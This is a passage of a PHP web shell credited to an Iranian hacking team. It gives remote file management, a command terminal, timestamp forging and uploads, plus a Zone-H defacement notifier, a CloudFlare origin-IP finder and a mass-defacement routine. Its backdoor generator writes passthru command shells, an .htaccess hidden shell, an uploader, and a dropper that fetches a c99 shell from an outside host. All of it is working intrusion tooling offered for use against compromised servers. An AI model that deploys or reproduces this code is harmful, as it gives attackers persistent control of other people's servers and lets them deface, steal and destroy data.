686 <td><a href="?action=ff&go=rename&file=<?php echo urlencode($directory); ?>&dir=<?php echo $path ?>&f=<?php echo $directory;?>#down" title="Rename">R</a></td>
687 <td><a href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $directory;?>#down" title="Touch">T</a></td>
688 <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td>
689 </tr>
690 <?php
691
692 }
693 }
694 ?>
695
696 </td>
697 </tr>
698 <?php
699
700 foreach($files_list as $file_list){
701 $entry_link=$path.$file_list;
702 $entry_link= ($entry_link);
703
704 ?><tr><td style="min-width:300px;"><?php
705 echo "<a href=\"?action=ff&go=view&file=$entry_link&dir=$path&f=$file_list#down\">$file_list</a></td>"
706 ;?>
707 <td style="width:150px"><?php echo (is_file($entry_link)?size(filesize($entry_link)):'dir');?></td>
708 <td style="min-width:300px;">
709
710 <?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $entry_link));?>
711
712 </td>
713 <td style="width:300px">
714 <?php
715
716 if(strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false){
717 $ow = @posix_getpwuid(@fileowner($entry_link));
718 } else{
719 $ow['name']="???";
720 }
721
722 if(strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false){
723 $gr = @posix_getgrgid(@filegroup($entry_link));
724 }else{
725 $gr['name']="???";
726 }
727
728 echo $ow['name']?$ow['name']:@fileowner($entry_link);
729 echo "/";
730 echo $gr['name']?$gr['name']:@filegroup($entry_link);
731
732
733 ?>
734 <td style="width:150px"><a href="?action=ff&go=perm&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $file_list;?>#down"><?php echo permsColor($entry_link); ?></a></td>
735 <td><a title="Rename" href="?action=ff&go=rename&file=<?php echo urlencode($file_list); ?>&dir=<?php echo $path ?>&f=<?php echo $file_list;?>#down">R</a></td>
736 <td><a title="Touch" href="?action=ff&go=touch&file=<?php echo $entry_link; ?>&dir=<?php echo $path; ?>&f=<?php echo $file_list;?>#down">T</a></td>
737 <td><a title="Edit" href="?action=ff&go=edit&file=<?php echo $entry_link ?>&dir=<?php echo $path ?>&f=<?php echo $file_list;?>#down">E</a></td>
738 <td><a title="Download" href="?action=ff&dir=<?php echo $path?>&go=download&file=<?php echo $entry_link; ?>">D</a></td>
739 <td><a title="Remove" href="?action=ff&dir=<?php echo $path?>&go=delete&f=<?php echo $entry_link ?>">X</a></td>
740
741 </tr>
742 <?php
743 }
744 ?>
745
746
747
748 </table>
749
750<a name="down"></a>
751<table style="float:left">
752<tr>
753<?php
754
755if(!is_writable($GLOBALS['path']))
756{
757echo "
758<style>
759.dir {
760background:red;
761}
762</style>
763";
764} else{
765echo "
766<style>
767.dir{
768background:#e3e3e3;
769}
770</style>
771";
772}
773
774?>
775 <hr>
776 <div class="box-box">
777 <div class="title"><h3>Upload File & Execute(CMD)</h3></div>
778 <div class="clear"></div>
779 <form action="" enctype="multipart/form-data" method="POST">
780<span>Select File: </span><input type="file" class="dir" name="userfile" style=" width: 238px;" /><input type="hidden" name="path" value="<?php echo $path ?>" /><input type="hidden" value="upload" name="type" /><input type="submit" value="Upload File" />
781</form><br><br>
782 <form action="?action=terminal&CMD=shell#down" method="post">
783<span>Terminal : </span>
784 <input onMouseOver="this.focus();" id="cmd" class="input dir" type="text" name="cmd" style=" width: 238px;" value="" />
785 <input class="inputbutn" type="submit" value="Execute" name="submitcmd" />
786
787 </form>
788 </div>
789 <div class="box-box">
790 <div class="title"><h3>File & Folder Maker</h3></div>
791 <div class="clear"></div>
792 <form action="" enctype="multipart/form-data" method="POST">
793<span>Make Folder: </span><input type="hidden" value="makefolder" name="type" /><input type="text" class="dir" name="namefolder" /><input type="submit" value="Make Folder" />
794</form>
795 <br><br>
796 <form action="" enctype="multipart/form-data" method="POST">
797<span>Make File: </span><input type="hidden" value="makefile" name="type" /><input type="text" class="dir" name="namefile" /><input type="submit" value="Make File" />
798</form>
799 </div>
800</tr>
801</table>
802
803<?php
804
805
806if(isset($_POST['type']) && $_POST['type']=="upload"){
807 if(isset($_FILES['userfile'])){
808 $upload_dir=$_POST['path'];
809 $upload_file=$upload_dir."/".basename($_FILES['userfile']['name']);
810
811 if(move_uploaded_file($_FILES['userfile']['tmp_name'],$upload_file)){
812 echo "ok";
813 header("location: ?action=explorer&dir=$path");
814 }
815
816}
817}
818
819if(isset($_POST['type']) && $_POST['type']=="makefolder"){
820
821if(isset($_POST['namefolder']) && $_POST['namefolder']!=""){
822$foldername=$path.$_POST['namefolder'];
823if(mkdir($foldername)){
824 echo "ok";
825 header("location: ?action=explorer&dir=$path");
826} else {
827 echo "can't be make folder";
828}
829} else{
830echo "enter folder name";
831}
832}
833
834if(isset($_POST['type']) && $_POST['type']=="makefile"){
835
836if(isset($_POST['namefile']) && $_POST['namefile']!=""){
837 $fn=$_POST['namefile'];
838$filename=$path.$_POST['namefile'];
839if(!file_exists($filename)){
840if(touch($filename)){
841
842$fp = fopen($filename, "w");
843if ($fp) {
844
845fclose($fp);
846header("location: ?action=ff&go=edit&file=$filename&dir=$path&f=$fn#down");
847}
848
849}
850
851 echo "ok";
852
853} else {
854 header("location: ?action=ff&go=edit&file=$filename&dir=$path&f=$fn#down");
855}
856} else{
857echo "enter file name";
858}
859}
860
861?>
862
863 </div>
864
865 <?php
866
867
868 }
869
870 if($action=="ff"){
871
872
873if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="download" && $_GET['file']!='' ){
874
875ob_end_clean();
876$_GET['file'] = urldecode($_GET['file']);
877if(is_file($_GET['file']) && is_readable($_GET['file'])) {
878ob_start("ob_gzhandler", 4096);
879
880header("Content-Disposition: attachment; filename=".basename($_GET['file']));
881if (function_exists("mime_content_type")) {
882$type = mime_content_type($_GET['file']);
883header("Content-Type: " . $type);
884} else {
885header("Content-Type: application/octet-stream");
886}
887$fp = fopen($_GET['file'], "r");
888if($fp) {
889while(!feof($fp))
890echo fread($fp, 1024);
891fclose($fp);
892}
893}exit;
894
895
896}
897ob_start();
898function info(){
899 global $path;
900echo "<ul class=\"info-file-info\">";
901$f2 = (htmlspecialchars($_GET['f']));
902$file2 = htmlspecialchars($_GET['file']);
903echo "<a href=\"?action=ff&go=rename&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Name: ".htmlspecialchars($_GET['f'])."</li></a>";
904if(!is_dir($file2)){
905echo "<a href=\"?action=ff&go=view&file=$file2&dir=$path&f=$f2#down\"><li class='active'>View: ".htmlspecialchars($_GET['f'])."</li></a>";
906echo "<a href=\"?action=ff&go=highlight&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Highlight: ".htmlspecialchars($_GET['f'])."</li></a>";
907echo "<a href=\"?action=ff&go=edit&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Edit: ".htmlspecialchars($_GET['f'])."</li></a>";
908}
909echo "<a href=\"?action=ff&go=touch&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Tuoch: ".@date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $file2))."</li></a>";
910echo "<li>Size: ".(is_file($_GET['file'])?size(filesize($_GET['file'])):'-')."</li>";
911echo "<a href=\"?action=ff&go=perm&file=$file2&dir=$path&f=$f2#down\"><li class='active'>Permissions: ".permsColor($_GET['file'])."</li></a>";
912if(strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false){
913 $ow = @posix_getpwuid(@fileowner($_GET['file']));
914 } else{
915 $ow['name']="???";
916 }
917
918 if(strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false){
919 $gr = @posix_getgrgid(@filegroup($_GET['file']));
920 }else{
921 $gr['name']="???";
922 }
923echo "<li>Owner/Group: ";
924echo $ow['name']?$ow['name']:@fileowner($_GET['file']);
925echo "/";
926echo $gr['name']?$gr['name']:@filegroup($_GET['file']);
927echo "</li>";
928echo "</ul>";
929echo "<div class=\"clear\"></div>";
930
931}
932//Coded By Mahdi.Hidden ~ Ashiyane Digital Security Team
933?>
934<div style="text-align:left">
935<?php
936info();
937?>
938<?php
939if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="rename" ){
940$f3 = htmlspecialchars($_GET['f']);
941$f4 = htmlspecialchars($_GET['file']);
942if(isset($_POST['name'])){
943 $nname=$_GET['dir'].$_POST['name'];
944 $nn=$_POST['name'];
945 $oname=$_GET['dir'].$_POST['file'];
946 if(@rename($oname,$nname)){
947 header("location: ?action=ff&go=rename&dir=$path&file=$nname&f=$nn");
948 } else {
949 echo "can't rename";
950 }
951}
952?>
953<a name="down"></a><br><span>Rename File:</span><form action="?action=ff&go=rename&dir=<?php echo htmlspecialchars($path)?>&file=<?php echo htmlspecialchars($_GET['file']);?>&f=<?php echo htmlspecialchars($_GET['f']);?>#down" method="post"><input type=text name=name value="<?php echo htmlspecialchars($_GET['f']);?>"><input type="hidden" name="file" value="<?php echo htmlspecialchars($_GET['f']);?>"><input type=submit value="Rename"></form>
954<?php
955}
956
957if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="view" && $_GET['file']!="" ){
958echo '<a name="down"></a><br><span>View File:</span><pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;background:whitesmoke;color:black">';
959
960$fp = @fopen(($_GET['file']), 'r');
961
962if($fp) {
963while( !@feof($fp) )
964echo htmlspecialchars(@fread($fp, 1024));
965@fclose($fp);
966}
967echo '</pre>';
968
969}
970if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="highlight" && $_GET['file']!="" ){
971
972
973if( @is_readable($_GET['file']) ) {
974 echo '<a name="down"></a><br><span>View File:</span><pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;background:whitesmoke;">';
975 $code = @highlight_file($_GET['file'],true);
976 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</pre>';
977 }
978
979}
980
981 if(isset($_GET['go']) && isset($_GET['f']) && $_GET['go']=="delete" && $_GET['f']!="" ){
982function deleteDir($path) {
983$path = (substr($path,-1)=='/') ? $path:$path.'/';
984$dh = opendir($path);
985while ( ($item = readdir($dh) ) !== false) {
986$item = $path.$item;
987if ( (basename($item) == "..") || (basename($item) == ".") )
988continue;
989$type = filetype($item);
990if ($type == "dir")
991deleteDir($item);
992else
993@unlink($item);
994}
995closedir($dh);
996@rmdir($path);
997}
998if(is_dir(@$_GET['f'])){
999deleteDir(@$_GET['f']);
1000header("location: ?action=explorer&dir=$path");
1001} else {
1002@unlink(@$_GET['f']);
1003
1004header("location: ?action=explorer&dir=$path");
1005}
1006 }
1007 if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="touch" && $_GET['file']!="" ){
1008 ?>
1009 <?php
1010
1011 ?>
1012 <a name=\"down\"></a><br><span>Touch: </span> <form action="?action=ff&go=ttouch&dir=<?php echo htmlspecialchars($path) ?>&file=<?php echo htmlspecialchars($_GET['file']);?>&f=<?php echo htmlspecialchars($_GET['f']);?>#down" method="post">
1013 <input type="hidden" name="f" value="<?php echo htmlspecialchars($_GET['file']);?>" /><input type="text" name="ttouch" value="<?php echo @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . htmlspecialchars($_GET['file']))); ?>" /><input type="submit" value="Touch" />
1014 </form>
1015 <?php
1016
1017
1018 }
1019 if(isset($_GET['go']) && isset($_POST['ttouch']) && $_GET['go']=="ttouch" && $_POST['ttouch']!="" ){
1020echo "<a name=\"down\"></a><hr><br>";
1021$f=$_POST['f'];
1022$f2=$_GET['f'];
1023$time = strtotime($_POST['ttouch']);
1024if($time) {
1025if(!touch($_POST['f'],$time,$time))
1026echo 'Fail!';
1027else
1028echo 'Touched!';header("location: ?action=ff&go=touch&dir=$path&file=$f&f=$f2");
1029
1030}
1031 }
1032 if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="perm" && $_GET['file']!="" ){
1033 ?>
1034 <a name=\"down\"></a><br><span>Change Modify: </span> <form action="?action=ff&go=chmod&file=<?php echo htmlspecialchars($_GET['file']);?>&f=<?php echo htmlspecialchars($_GET['f']); ?>&dir=<?php echo htmlspecialchars($path) ?>" method="post">
1035 <input type="hidden" name="f" value="<?php echo htmlspecialchars($_GET['file']);?>" /><input type="hidden" name="f2" value="<?php echo htmlspecialchars($_GET['f']);?>" /><input type="text" name="perm" value="<?php echo substr(sprintf('%o', fileperms(htmlspecialchars($_GET['file']))),-4);?>" /><input type="submit" value="Change Prem" />
1036 </form>
1037 <?php
1038 }
1039 if(isset($_GET['go']) && isset($_POST['f']) && $_GET['go']=="chmod" && $_POST['f']!="" ){
1040 $f=$_POST['f'];
1041 $f2=$_POST['f2'];
1042
1043if(!empty($_POST['perm']) ) {
1044$perms = 0;
1045for($i=strlen($_POST['perm'])-1;$i>=0;--$i)
1046$perms += (int)$_POST['perm'][$i]*pow(8, (strlen($_POST['perm'])-$i-1));
1047if(!@chmod($f, $perms))
1048echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font>';
1049}
1050echo '<font color="#FFFFFF"><b>OK !</b></font>';
1051header("location: ?action=ff&go=perm&dir=$path&file=$f&f=$f2");
1052
1053
1054 }
1055
1056
1057 if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="edit" && $_GET['file']!="" ){
1058 echo "<a name=\"down\"></a>";
1059$f=htmlspecialchars($_GET['file']);
1060if( !is_writable(htmlspecialchars($_GET['file']))) {
1061echo 'File isn\'t writeable';
1062exit;
1063}
1064if(!empty($_POST['etext']) ) {
1065$time = @filemtime(htmlspecialchars($_GET['file']));
1066$_POST['text'] = substr($_POST['text'],0);
1067$fp = @fopen(htmlspecialchars($_GET['file']),"w");
1068if($fp) {
1069@fwrite($fp,$_POST['text']);
1070@fclose($fp);
1071echo 'Saved!';
1072@touch($_GET['file'],$time,$time);
1073}
1074}
1075$ff=htmlspecialchars($_GET['file']);
1076$fff=htmlspecialchars($_GET['f']);
1077echo "<br><span>Edit File: </span><form action=\"?action=ff&go=edit&file=$f&dir=$path&file=$ff&f=$fff#down\" method=\"post\"><textarea name=\"text\" style=\"width:800px;height:400px\">";
1078$fp = @fopen($_GET['file'], 'r');
1079if($fp) {
1080while( !@feof($fp) )
1081echo htmlspecialchars(@fread($fp, 1024));
1082@fclose($fp);
1083}
1084echo '</textarea><input type=submit value="Edit" name="etext"></form>';
1085 }
1086
1087
1088?>
1089
1090</div>
1091 <?php
1092
1093 }
1094
1095
1096if($action=="zoneh"){
1097 ?><br />
1098 <div class="zoneh">
1099 <center>
1100 <form action="?action=zoneh&submit=send&dir=<?php echo htmlspecialchars($path) ?>" method="post">
1101<span>Notifier: </span><input name="defacer" size="67" id="text" value="Ashiyane Digital Security Team" type="text"><br />
1102<span>Select Hack Method: </span><select name="hackmode">
1103<option value="">--------SELECT--------</option>
1104<option value="1" >known vulnerability (i.e. unpatched system)</option>
1105<option value="2" >undisclosed (new) vulnerability</option>
1106<option value="3" >configuration / admin. mistake</option>
1107<option value="4" >brute force attack</option>
1108<option value="5" >social engineering</option>
1109<option value="6" >Web Server intrusion</option>
1110<option value="7" >Web Server external module intrusion</option>
1111<option value="8" >Mail Server intrusion</option>
1112<option value="9" >FTP Server intrusion</option>
1113<option value="10" >SSH Server intrusion</option>
1114<option value="11" >Telnet Server intrusion</option>
1115<option value="12" >RPC Server intrusion</option>
1116<option value="13" >Shares misconfiguration</option>
1117<option value="14" >Other Server intrusion</option>
1118<option value="15" >SQL Injection</option>
1119<option value="16" >URL Poisoning</option>
1120<option value="17" >File Inclusion</option>
1121<option value="18" >Other Web Application bug</option>
1122<option value="19" >Remote administrative panel access through bruteforcing</option>
1123<option value="20" >Remote administrative panel access through password guessing</option>
1124<option value="21" >Remote administrative panel access through social engineering</option>
1125<option value="22" >Attack against the administrator/user (password stealing/sniffing)</option>
1126<option value="23" >Access credentials through Man In the Middle attack</option>
1127<option value="24" >Remote service password guessing</option>
1128<option value="25" >Remote service password bruteforce</option>
1129<option value="26" >Rerouting after attacking the Firewall</option>
1130<option value="27" >Rerouting after attacking the Router</option>
1131<option value="28" >DNS attack through social engineering</option>
1132<option value="29" >DNS attack through cache poisoning</option>
1133<option value="30" >Not available</option>
1134<option value="31" >Cross-Site Scripting</option>
1135</select>
1136<br />
1137<span>Select The Reason: </span><select name="reason">
1138<option value="">--------SELECT--------</option>
1139<option
1140value="1" >Heh...just for fun!</option>
1141<option value="2" >Revenge against that website</option>
1142<option value="3" >Political reasons</option>
1143<option value="4" >As a challenge</option>
1144<option value="5" >I just want to be the best defacer</option>
1145<option value="6" >Patriotism</option>
1146<option value="7" >Not available</option>
1147</select><br />
1148<textarea name="domains" cols="90" rows="20" placeholder="Domains..."></textarea>
1149<br />
1150<input type="submit" value="send" />
1151</form>
1152
1153</center>
1154<?php
1155
1156
1157if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="send") {
1158
1159$defacer= $_REQUEST['defacer'];
1160$hackmode= $_REQUEST['hackmode'];
1161$reason= $_REQUEST['reason'];
1162$domains= $_REQUEST['domains'];
1163$domains_list=explode("\n",$domains);
1164
1165if (empty($defacer))
1166{
1167die ("<center><b><font color =\"#FF0000\">You Must Fill The Notifier Name</font></b></center>");
1168}
1169elseif($hackmode == "")
1170{
1171die("<center><b><font color =\"#FF0000\">You Must Select The Method</b></font></center>");
1172}
1173elseif($reason == "")
1174{
1175die("<center><b><font color =\"#FF0000\">You Must Select The Reason</b></font></center>");
1176}
1177elseif(empty($domains))
1178{
1179die("<center><b><font color =\"#FF0000\">You Must Enter The Sites List<font></b></center>");
1180}
1181
1182
1183 for($i=0;$i<count($domains_list);$i++) {
1184
1185 if(substr($domains_list[$i], 0, 4) != "http")
1186 {
1187 $domains_list[$i] = "http://".$domains_list[$i];
1188 }
1189 $postVars=array("defacer"=>$defacer,"hackmode"=>$hackmode,"reason"=>$reason,"domain1"=>$domains_list[$i]);
1190
1191 $curl = curl_init();
1192 curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
1193 curl_setopt($curl,CURLOPT_URL,'http://www.zone-h.com/notify/single');
1194 curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, FALSE);
1195 curl_setopt($curl,CURLOPT_TIMEOUT, 120);
1196 curl_setopt($curl,CURLOPT_POST,TRUE);
1197 curl_setopt($curl,CURLOPT_POSTFIELDS, $postVars);
1198 $a = curl_exec($curl);
1199 curl_close($curl);
1200}
1201 echo "<pre style=\"margin-top:5px\"><br><center><font color =\"#00A220\"><b>Sending Sites To Zone-H Has Been Completed Successfully !!!</b><font></center>";
1202
1203}
1204
1205
1206
1207?>
1208</div>
1209
1210 <?php
1211 }
1212
1213 if($action=="cloudflare"){
1214 ?>
1215 <br>
1216<center>
1217<b>Cloud Flare Bypasser</b>
1218<form action="?action=cloudflare&dir=<?php echo htmlspecialchars($path);?>" method="post">
1219<p><br><input type='text' size=30 name='url' placeholder="Site.com">
1220<input type='submit' name='submit' value='>>' />
1221</p>
1222</form>
1223</center>
1224
1225 <?php
1226
1227
1228 if(isset($_POST['submit']) && $_POST['submit'] == '>>' && isset($_POST['url']) && !empty($_POST['url'])){
1229 function is_ipv4($ip)
1230 {
1231 return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
1232 }
1233 function getipCloudFlare($url){
1234 $url = "http://www.cloudflare-watch.org/cgi-bin/cfsearch.cgi";
1235 $login_data = "cfS=$url";
1236 $login = curl_init();
1237 curl_setopt($login, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0');
1238 curl_setopt($login, CURLOPT_TIMEOUT, 40);
1239 curl_setopt($login, CURLOPT_RETURNTRANSFER, 1);
1240 curl_setopt($login, CURLOPT_URL, $url);
1241 curl_setopt($login, CURLOPT_HEADER, 1);
1242 curl_setopt($login, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
1243 curl_setopt($login, CURLOPT_FOLLOWLOCATION, 1);
1244 curl_setopt($login, CURLOPT_POST, 1);
1245 curl_setopt($login, CURLOPT_POSTFIELDS, $login_data);
1246 $content= curl_exec($login);
1247 if (preg_match("/<UL><LI>(.*?)<\/UL>/",$content,$find)){
1248 return $find[1];
1249 }
1250 else {
1251 return 'Error';
1252 }
1253 curl_close($login);
1254 }
1255 $me = $argv[0];
1256 $url = $_POST['url'];
1257 if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
1258 $url = preg_replace('/^(https?):\/\//', '', $url);
1259 $url = "http://www.".$url;
1260 }
1261 $headers = get_headers($url, 1);
1262 $server = $headers['Server'];
1263 $subs = array('cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns1.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.');
1264 $count = count($subs);
1265 if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches))
1266 {
1267 if($matches[2] != 'www')
1268 {
1269 $url = preg_replace('/^(https?):\/\//', '', $url);
1270 }
1271 else
1272 {
1273 $url = explode($matches[0], $url);
1274 $url = $url[1];
1275 }
1276 }
1277 if(is_array($server))
1278 $server = $server[0];
1279 echo '<pre style="border:2px solid #CE3F3F;padding:5px;margin:0;overflow: auto;"><br/>';
1280 if(preg_match('/cloudflare/i', $server))
1281 echo "\n[+] CloudFlare detected: {$server}\n<br>";
1282 else
1283 echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
1284 echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
1285 echo "[+] Searching for more IP addresses.\n\n<br><br>";
1286 for($x = 0; $x < $count; $x++)
1287 {
1288 $site = $subs[$x] . $url;
1289 $ip = is_ipv4(gethostbyname($site));
1290 if($ip == '(Null)')
1291 continue;
1292 echo "Trying {$site}: {$ip}\n<br>";
1293 }
1294 echo "\n[+] Finished.\n<br>";
1295 }
1296 }
1297
1298 if($action=="backdoor"){
1299 echo "<style>#backdoor{background: #A81F1F}</style>";
1300
1301 ?>
1302
1303
1304
1305
1306<br />
1307<div class="body">
1308
1309<?php
1310
1311$list = '<ul class="backdoor">';
1312
1313if ( !isset($_GET["bd"]) || $_GET["bd"]!=="up" )
1314{
1315 $list .= "<a href=\"?action=backdoor&bd=up&dir=$path\"><li>Upload From Computer Backdoors</li></a>";
1316} else {
1317 $list .= '<li><span>Upload From Computer Backdoors</span></li>';
1318}
1319
1320if( !isset($_GET["bd"]) || $_GET["bd"]!=="ur" )
1321{
1322 $list .= "<a href=\"?action=backdoor&bd=ur&dir=$path\"><li>Upload From URL Backdoors</li></a>";
1323} else {
1324 $list .= '<li><span>Upload From URL Backdoors</span></li>';
1325}
1326
1327if( !isset($_GET["bd"]) || $_GET["bd"]!=="ht" )
1328{
1329 $list .= "<a href=\"?action=backdoor&bd=ht&dir=$path\"><li>htaccess Hidden Shell Backdoor</li></a>";
1330} else {
1331 $list .= '<li><span>htaccess Hidden Shell Backdoor</span></li>';
1332}
1333
1334if ( !isset($_GET["bd"]) || $_GET["bd"]!=="cs" )
1335{
1336 $list .= "<a href=\"?action=backdoor&bd=cs&dir=$path\"><li>CMD shell Backdoor</li></a>";
1337} else {
1338 $list .= '<li><span>CMD shell Backdoor</span></li>';
1339}
1340
1341echo $list.'</ul>';
1342
1343?>
1344
1345<hr />
1346<br />
1347<?php
1348
1349if(isset($_GET["bd"])){
1350
1351 $bd = $_GET["bd"];
1352
1353 if($bd=="up"){
1354
1355 echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=up&dir=$path\"><span>Enter Filename create backdoor: </span><br /><input type=\"text\" name=\"filename\"><input type=\"submit\" value=\"Get Backdoor\"></form>";
1356 ?>
1357<br />
1358<b><span>Note: This Just Make an uploader not hidden.</span></b>
1359<?php
1360 }
1361
1362 if($bd=="ur"){
1363
1364 echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=ur&dir=$path\"><span>Enter Filename to add backdoor: </span><br /><input type=\"text\" name=\"filename\"><input type=\"submit\" value=\"Get Backdoor\"></form>";
1365 ?>
1366<br />
1367<b><span>How to use ?</span></b>
1368<p>to use : "site.com/[path]/[file].php?cmd=shell"</p>
1369<?php
1370
1371 }
1372 if($bd=="cs"){
1373
1374 echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=cs&dir=$path\"><span>Enter Filename to add backdoor: </span><br /><input type=\"text\" name=\"filename\"><input type=\"submit\" value=\"Get Backdoor\"></form>";
1375 ?>
1376<br />
1377<b><span>How to use ?</span></b>
1378<p>to use : "site.com/[path]/[file].php?cmd=[command]"</p>
1379<?php
1380 }
1381
1382
1383
1384 if($bd=="ht"){
1385
1386
1387 echo "<form method=\"post\" action=\"?action=backdoor&submit=get&go=ht&dir=$path\"><input type=\"submit\" value=\"Get htaccess Backdoor\"></form>";
1388
1389 ?>
1390<br />
1391<b><span>How to use ?</span></b>
1392<p>to use : "site.com/[path]/.htaccess?cmd=[command]"</p>
1393<?php
1394
1395 }
1396
1397
1398
1399
1400}
1401
1402if(isset($_GET["action"]) && $_GET["action"]=="backdoor" && isset($_GET["submit"])=="get" && isset($_GET["go"]) && $_GET["go"]!=""){
1403
1404 $action=htmlspecialchars($_GET["go"]);
1405
1406
1407 if($action=="up"){
1408
1409 $code='<?php
1410if (isset($_FILES["userfile"])) {
1411$dir=$_POST["dir"];
1412if($dir == "" || !isset($dir)) $dir=getcwd();
1413
1414
1415$uploadfile=$dir."/".basename($_FILES["userfile"]["name"]);
1416
1417if (move_uploaded_file($_FILES["userfile"]["tmp_name"],$uploadfile)) {
1418echo "Uploaded: ".
1419"Name: ".$_FILES["userfile"]["name"]."<br>\n".
1420"Type: ".$_FILES["userfile"]["type"]."<br>\n".
1421"Size: ".$_FILES["userfile"]["size"]." bytes<br>\n";
1422}
1423else print "Error uploading file: ".$_FILES["userfile"]["name"]."";
1424echo "<hr>";
1425}
1426?>
1427
1428<form enctype="multipart/form-data" method="POST">
1429Upload New File
1430<br /><input type="file" name="userfile"/>
1431<br /><input type="submit" value="Upload"/>
1432</form>';
1433 $filename = htmlspecialchars($_POST["filename"]);
1434
1435 $fp=fopen($filename,'a');
1436 $res = fwrite($fp , $code);
1437 fclose($fp);
1438
1439 if($res){
1440
1441 echo "<span style='color:green'>ok</span>";
1442 }else{
1443 echo "<span style='color:red'>cant write</span>";
1444 }
1445 }
1446
1447 if($action=="ur"){
1448
1449 $code = '<?php
1450//Code By Mahdi.Hidden ~ Ashiyane Digital Security Team
1451if(isset($_GET["cmd"]) && $_GET["cmd"]=="shell"){
1452if(file_put_contents("shell.php", file_get_contents("http://www.sh3ll.org/c99.txt"))){
1453echo "OK";
1454} else {
1455echo "File Cant Be Create";
1456}
1457}
1458//Code By Mahdi.Hidden ~ Ashiyane Digital Security Team
1459?>';
1460 $filename = htmlspecialchars($_POST["filename"]);
1461
1462
1463 $fp=fopen($filename,'a');
1464 $res = fwrite($fp , $code);
1465 fclose($fp);
1466
1467 if($res){
1468
1469 echo "<span style='color:green'>ok</span>";
1470 }else{
1471 echo "<span style='color:red'>cant be write</span>";
1472 }
1473 }
1474
1475 if($action=="ht"){
1476
1477 $code = '<Files ~ "^\.ht">
1478Order allow,deny
1479Allow from all
1480</Files>
1481AddType application/x-httpd-php .htaccess
1482# <?php passthru($_GET["cmd"]); ?>';
1483
1484 $filename = ".htaccess";
1485 $fp=fopen($filename,'a');
1486 $res = fwrite($fp , $code);
1487 fclose($fp);
1488
1489 if($res){
1490
1491 echo "<span style='color:green'>ok</span>";
1492 }else{
1493 echo "<span style='color:red'>cant be write</span>";
1494 }
1495
1496
1497
1498
1499 }
1500 if($action=="cs"){
1501
1502 $code = '<?php passthru($_GET["cmd"]); ?>';
1503
1504 $filename = htmlspecialchars($_POST["filename"]);
1505 $fp=fopen($filename,'a');
1506 $res = fwrite($fp , $code);
1507 fclose($fp);
1508
1509 if($res){
1510
1511 echo "<span style='color:green'>ok</span>";
1512 }else{
1513 echo "<span style='color:red'>cant be write</span>";
1514 }
1515
1516 }
1517
1518}
1519
1520
1521
1522
1523
1524?>
1525</div>
1526
1527 <?php
1528 }
1529
1530 if($action=="mass"){
1531 ?>
1532
1533<br />
1534
1535Mass Defacement:</td><br>
1536<form action='?action=mass&submit=mass&dir=<?php echo $path ?>' method='post'>
1537Directory: <input type='text' style='width: 700px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>
1538<br/>Url Deface Deface Page <input type='text' style='width: 675px' name='massdefaceurl' value=''>
1539<br/>Name File <input type='text' style='width: 735px' name='filename' value='mahdi.hidden.html'>
1540<input type='submit' name='execmassdeface' value='Kill It'></form></td>
1541
1542 <?php
1543
1544if(isset($_REQUEST['submit']) && $_REQUEST['submit']=="mass"){
1545echo "<br><span style='margin-left:0px'>Results: </span><br><center><textarea placeholder='Results will be here..' rows='15' cols='100'>";
1546$defaceurl = htmlspecialchars($_POST['massdefaceurl']);
1547$dir = htmlspecialchars($_POST['massdefacedir']);
1548$filename = htmlspecialchars($_POST['filename']);
1549echo $dir."\n";
1550if (is_dir($dir)) {
1551if ($dh = opendir($dir)) {
1552while (($file = readdir($dh)) !== false) {
1553if(filetype($dir.$file)=="dir"){
1554$newfile=$dir.$file."/".$filename;
1555echo $newfile."\n";
1556if (!copy($defaceurl, $newfile)) {
1557echo "failed to copy $file...\n";
1558}
1559}
1560}
1561closedir($dh);
1562}
1563}
1564echo "</textarea></center>";
1565}
1566?>
1567
1568 <?php
1569 }
1570
1571
1572 if($action=="disfunc"){
1573 ?>
1574 <br />
1575 <center>
1576 <table>
1577 <tr><td>
